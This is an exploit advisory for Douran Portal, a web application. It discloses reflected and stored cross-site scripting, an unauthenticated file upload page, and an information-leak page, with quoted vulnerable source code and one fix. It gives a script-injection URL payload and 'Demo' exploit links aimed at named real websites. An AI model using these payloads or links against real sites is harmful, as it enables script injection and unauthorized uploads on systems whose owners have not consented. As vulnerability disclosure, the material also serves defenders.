===========================================================
[+] Douran Portal <= V3.9.7.55 Multiple Remote Vulnerabilities
===========================================================
[+] Author : ItSecTeam
[+] Contact : Bug@itsecteam.com
[+] Site : www.itsecteam.com
[+] Forum : http://forum.itsecteam.com/
[+] Thanks : Amin Shokohi (Pejvak!) , homay
~~~~~~~~~~~~~~~~[Information]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Web App : Douran Portal
[+] Version : Worked In Last Version (V3.9.7.55) And Prior
[+] Software: http://www.douran.com
[+][+][+][+][+][+][+](Vulnerabilities)[+][+][+][+][=][+][+]
[1] Xss None Present :
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.OrderForm
private void Page_Load(object sender, EventArgs e)
{
this.lblTitle.Text = Localize.GetString("ORDER_FOR", "Order form for")
+ " " + base.Request.QueryString["ItemTitle"];
}
Print Request.QueryString["ItemTitle"] Without Check
[~] Secure :
private void Page_Load(object sender, EventArgs e)
{
this.lblTitle.Text = Localize.GetString("ORDER_FOR", "Order form for")
+ " " + CheckString(base.Request.QueryString["ItemTitle"]);
}
[-] End Poc
[#] Exploit :
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[*] Demo :
http://isaar.ir/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[2] Remote File Upload :
[Note] : Worked In Older 3.8.2.2
[~] Poc :
You Can Upload Your File Without Check Authorization
You Can Upload :
string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
Demo :http://www.isbn.ir/DesktopModules/ftb/ftb.imagegallery.aspx
[3] Information Leakage Show Device Info :
http://Site.Com/security/DeviceInfo.aspx
[4] Xss Present :
http://Site.Com/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
blogDB.AddBlogComment(ModuleID, ItemID,
this.txtName.Text,this.txtTitle.Text, this.txtURL.Text,
this.txtComments.Text);
}
public void AddBlogComment(int moduleID, int itemID, string name, string
title, string url, string comment)
{
if (name.Length < 1)
{
name = "unknown";
}
if (title.Length > 100)
{
title = title.Substring(0, 100);
}
if (name.Length > 100)
{
name = name.Substring(0, 100);
}
if (url.Length > 200)
{
url = url.Substring(0, 200);
}
SqlConnection sqlConnectionString = PortalSettings.SqlConnectionString;
SqlCommand command = new SqlCommand("dp_BlogCommentAdd",
sqlConnectionString);
command.CommandType = CommandType.StoredProcedure;
SqlParameter parameter = new SqlParameter("@ModuleID", SqlDbType.Int, 4);
parameter.Value = moduleID;
command.Parameters.Add(parameter);
SqlParameter parameter2 = new SqlParameter("@ItemID", SqlDbType.Int, 4);
parameter2.Value = itemID;
command.Parameters.Add(parameter2);
SqlParameter parameter3 = new SqlParameter("@Name",
SqlDbType.NVarChar, 100);
parameter3.Value = name;
command.Parameters.Add(parameter3);
SqlParameter parameter4 = new SqlParameter("@Title",
SqlDbType.NVarChar, 100);
parameter4.Value = title;
command.Parameters.Add(parameter4);
SqlParameter parameter5 = new SqlParameter("@URL", SqlDbType.NVarChar,
200);
parameter5.Value = url;
command.Parameters.Add(parameter5);
SqlParameter parameter6 = new SqlParameter("@Comment", SqlDbType.NText);
parameter6.Value = comment;
command.Parameters.Add(parameter6);
sqlConnectionString.Open();
command.ExecuteNonQuery();
sqlConnectionString.Close();}
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~